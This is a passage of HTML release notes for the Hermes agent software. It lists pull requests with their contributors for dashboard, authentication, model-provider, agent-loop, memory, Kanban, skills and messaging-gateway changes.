<li>System page: check-before-update flow + Debug Share (<a href="https://github.com/NousResearch/hermes-agent/pull/38205" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38205/hovercard">#38205</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38600" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38600/hovercard">#38600</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>nous-blue theme, bulk sessions, schedule picker; enriched profiles dashboard + de-dupe channel env vars; configurable terminal background via theme (<a href="https://github.com/NousResearch/hermes-agent/pull/37383" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37383/hovercard">#37383</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37872" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37872/hovercard">#37872</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37156" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37156/hovercard">#37156</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Always enable embedded chat; remove dashboard <code>--tui</code> flag (<a href="https://github.com/NousResearch/hermes-agent/pull/38591" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38591/hovercard">#38591</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
</ul>
<h3>Auth</h3>
<ul>
<li>Pluggable username/password login (Option B); generic self-hosted OIDC provider + multi-provider verify fix; <code>hermes dashboard register</code> for self-hosted OAuth client (<a href="https://github.com/NousResearch/hermes-agent/pull/38819" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38819/hovercard">#38819</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38917" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38917/hovercard">#38917</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38802" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38802/hovercard">#38802</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Rotate dashboard sessions via refresh token; share <code>/api/*</code> public allowlist between legacy and OAuth gates; drop <code>/api/*</code> paths from OAuth <code>next=</code> round trip (<a href="https://github.com/NousResearch/hermes-agent/pull/37247" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37247/hovercard">#37247</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34254" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34254/hovercard">#34254</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36244" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36244/hovercard">#36244</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li>Chat tab works in gated (OAuth) mode; trust non-web WS origins on OAuth-gated binds after ticket auth; authenticate server-spawned PTY child WS; sanction plugin WS/upload auth via SDK helpers (<a href="https://github.com/NousResearch/hermes-agent/pull/34793" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34793/hovercard">#34793</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37870" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37870/hovercard">#37870</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37972" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37972/hovercard">#37972</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38549" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38549/hovercard">#38549</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Allow desktop websocket origins on remote binds (<a href="https://github.com/NousResearch/hermes-agent/pull/37747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37747/hovercard">#37747</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Provider &amp; model support</h3>
<ul>
<li>New models: <code>deepseek-v4-flash</code> (+ trimmed variants, maker-grouped curated lists), <code>MiniMax-M3</code> with 1M context on native minimax providers, <code>qwen3.7-plus</code> (Nous + OpenRouter), <code>gemini-3.5-flash</code> to Gemini OAuth + API-key pickers (<a href="https://github.com/NousResearch/hermes-agent/pull/35659" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35659/hovercard">#35659</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36214/hovercard">#36214</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39409" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39409/hovercard">#39409</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37046" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37046/hovercard">#37046</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Model picker: fuzzy search across WebUI/TUI/CLI; group multi-endpoint providers under one row; refresh provider descriptions + describe grouped rows; refresh catalog hourly; stop routing OpenAI selection to OpenRouter (<a href="https://github.com/NousResearch/hermes-agent/pull/36928" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36928/hovercard">#36928</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35227" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35227/hovercard">#35227</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35773" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35773/hovercard">#35773</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35756/hovercard">#35756</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37175" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37175/hovercard">#37175</a>)</li>
<li>Always show Nous Tool Gateway backends, login on select; surface the Nous free tool pool (entitlement + setup prompt); route FAL video gen through managed Nous gateway (<a href="https://github.com/NousResearch/hermes-agent/pull/35792" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35792/hovercard">#35792</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36153" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36153/hovercard">#36153</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/33259" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33259/hovercard">#33259</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</li>
<li>Persist mid-session model switch to database; recover model on post-interrupt recovery turn (<a href="https://github.com/NousResearch/hermes-agent/pull/35256" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35256/hovercard">#35256</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35381" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35381/hovercard">#35381</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Credential pool: <code>STATUS_DEAD</code> for terminal OAuth failures; isolate custom provider picker credentials (<a href="https://github.com/NousResearch/hermes-agent/pull/34412" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34412/hovercard">#34412</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34810" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34810/hovercard">#34810</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Disable Nous Portal legacy session-key inference fallback — JWT-only (<a href="https://github.com/NousResearch/hermes-agent/pull/34508" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34508/hovercard">#34508</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
</ul>
<h3>Agent loop, prompt &amp; tools</h3>
<ul>
<li><code>/undo [N]</code> — backs up N user turns with prefill + soft-delete (CLI/TUI + messaging-platform parity) (<a href="https://github.com/NousResearch/hermes-agent/pull/36229" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36229/hovercard">#36229</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36699" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36699/hovercard">#36699</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Progressive tool disclosure for MCP and plugin tools (scoped); embedder environment-hint hook for the system prompt; universal task-completion guidance + local Python toolchain probe (<a href="https://github.com/NousResearch/hermes-agent/pull/34493" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34493/hovercard">#34493</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34574" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34574/hovercard">#34574</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34340" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34340/hovercard">#34340</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Uncap delegation <code>max_spawn_depth</code> (floor 1, no ceiling); broaden Hermes self-knowledge pointer to docs + skill; <code>hermes prompt-size</code> diagnostic (<a href="https://github.com/NousResearch/hermes-agent/pull/39772" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39772/hovercard">#39772</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38538" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38538/hovercard">#38538</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35276" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35276/hovercard">#35276</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><code>perf(read_file)</code>: compact line-number gutter — ~14% fewer tokens per read (now the only format) (<a href="https://github.com/NousResearch/hermes-agent/pull/35368" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35368/hovercard">#35368</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35532" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35532/hovercard">#35532</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Resolve agent cwd from <code>TERMINAL_CWD</code> via one reader; align prefill messages key handling; resume relaunches in the session's original working directory (<a href="https://github.com/NousResearch/hermes-agent/pull/35028" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35028/hovercard">#35028</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/banditburai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/banditburai">@banditburai</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38760" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38760/hovercard">#38760</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38562" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38562/hovercard">#38562</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Prevent session-id fork from concurrent compressions; observer telemetry hooks + NeMo-Relay plugin (gated tool emit) (<a href="https://github.com/NousResearch/hermes-agent/pull/34351" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34351/hovercard">#34351</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38232" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38232/hovercard">#38232</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Sessions, state &amp; memory</h3>
<ul>
<li><code>perf(state)</code>: merge FTS5 segments on VACUUM + <code>hermes sessions optimize</code>; keep <code>/branch</code> sessions visible after parent reopen; survive missing FTS5 runtimes (<a href="https://github.com/NousResearch/hermes-agent/pull/34596" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34596/hovercard">#34596</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39214/hovercard">#39214</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35452" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35452/hovercard">#35452</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>)</li>
<li>Honcho: make startup fail open; harden self-hosted setup paths (<a href="https://github.com/NousResearch/hermes-agent/pull/24847" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24847/hovercard">#24847</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35170" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35170/hovercard">#35170</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Supermemory: session-level ingest + kebab aliases (<a href="https://github.com/NousResearch/hermes-agent/pull/38756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38756/hovercard">#38756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</li>
</ul>
<h2>🧩 Multi-Agent (Kanban) &amp; Skills</h2>
<h3>Kanban</h3>
<ul>
<li><code>goal_mode</code> cards run workers in a <code>/goal</code> loop; file attachments on tasks; attach images referenced in task bodies to worker vision (<a href="https://github.com/NousResearch/hermes-agent/pull/35710" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35710/hovercard">#35710</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35395" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35395/hovercard">#35395</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34210/hovercard">#34210</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><code>default_assignee</code> fallback + per-profile concurrency cap; <code>POST /runs/{run_id}/terminate</code> endpoint; gate notifier watcher on <code>dispatch_in_gateway</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/34244" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34244/hovercard">#34244</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34449/hovercard">#34449</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37174" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37174/hovercard">#37174</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>CLI dispatch config passthrough + humanizer skill swap (<a href="https://github.com/NousResearch/hermes-agent/pull/34337" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34337/hovercard">#34337</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Skills</h3>
<ul>
<li><strong>Leaner default skill set</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/39028" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39028/hovercard">#39028</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>):
<ul>
<li>Removed (redundant / dead): <code>spotify</code> (→ Spotify plugin's 7 native tools), <code>linear</code> (→ <code>hermes mcp install linear</code>), <code>kanban-codex-lane</code>, <code>debugging-hermes-tui-commands</code>, stale <code>domain</code> orphan, empty category markers (<code>diagramming</code>, <code>gifs</code>, <code>inference-sh</code>, <code>mlops/training</code>, <code>mlops/vector-databases</code>)</li>
<li>Bundled → optional: <code>baoyu-article-illustrator</code>, <code>baoyu-comic</code>, <code>creative-ideation</code>, <code>pixel-art</code>, <code>dspy</code>, <code>subagent-driven-development</code>, <code>minecraft-modpack-server</code>, <code>pokemon-player</code>, <code>hermes-s6-container-supervision</code></li>
<li>Consolidated: <code>webhook-subscriptions</code> + <code>native-mcp</code> folded into the <code>hermes-agent</code> skill as on-demand references; <code>writing-plans</code> merged into <code>plan</code> (v2.0.0)</li>
<li>New <code>environments:</code> frontmatter relevance gate (<code>kanban</code> / <code>docker</code> / <code>s6</code>) — context-specific skills stop appearing in the index for users who won't use them, still load on explicit request</li>
</ul>
</li>
<li>Curator can now prune unused <strong>built-in</strong> skills (not just agent-created), with usage tracked for every skill (<a href="https://github.com/NousResearch/hermes-agent/pull/36701" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36701/hovercard">#36701</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Blank-slate skills — <code>install --no-skills</code> + opt-out/opt-in for the default profile (<a href="https://github.com/NousResearch/hermes-agent/pull/36228" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36228/hovercard">#36228</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>NVIDIA/skills trusted tap</strong> — <code>NVIDIA/skills</code> is now a default trusted Skills Hub tap alongside OpenAI/Anthropic/HuggingFace; <code>skills.sh.json</code> sidecar gives taps real category labels (<a href="https://github.com/NousResearch/hermes-agent/pull/34333" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34333/hovercard">#34333</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Skills Hub: fix browse cap, add source links + copy buttons + category cleanup (<a href="https://github.com/NousResearch/hermes-agent/pull/37143" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37143/hovercard">#37143</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>New optional skills: <code>grok</code> (xAI Grok Build CLI), <code>antigravity-cli</code> operator (under autonomous-ai-agents) (<a href="https://github.com/NousResearch/hermes-agent/pull/34582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34582/hovercard">#34582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34583" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34583/hovercard">#34583</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34604" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34604/hovercard">#34604</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>📱 Messaging Platforms (Gateway)</h2>
<ul>
<li>Structured stream-event protocol + Telegram draft formatting parity; per-platform streaming defaults (Telegram on, Discord off) + dashboard toggles; surface gateway streaming block in <code>DEFAULT_CONFIG</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/37250" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37250/hovercard">#37250</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37303" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37303/hovercard">#37303</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37285/hovercard">#37285</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Discord voice-channel mixer — ambient idle bed + verbal acks that overlap TTS; explain <code>/voice</code> usage when toggled bare (<a href="https://github.com/NousResearch/hermes-agent/pull/39659" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39659/hovercard">#39659</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39766" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39766/hovercard">#39766</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Handle Feishu meeting invitations; bluebubbles group mention gating; matrix bang-command aliases; matrix fail-closed approval reaction auth (<a href="https://github.com/NousResearch/hermes-agent/pull/39040" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39040/hovercard">#39040</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37091" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37091/hovercard">#37091</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38175" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38175/hovercard">#38175</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/34567" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/34567/hovercard">#34567</a>)</li>
<li>Clean service restart flow; close ResponseStore + dispose unowned adapter on reconnect failure; weixin <code>asyncio.wait_for</code> timeouts (<a href="https://github.com/NousResearch/hermes-agent/pull/36188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36188/hovercard">#36188</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37679" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37679/hovercard">#37679</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Fearvox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Fearvox">@Fearvox</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35117" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35117/hovercard">#35117</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/banditburai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/banditburai">@banditburai</a>)</li>
</ul>
<h2>🖥️ CLI, TUI &amp; Setup</h2>
<ul>
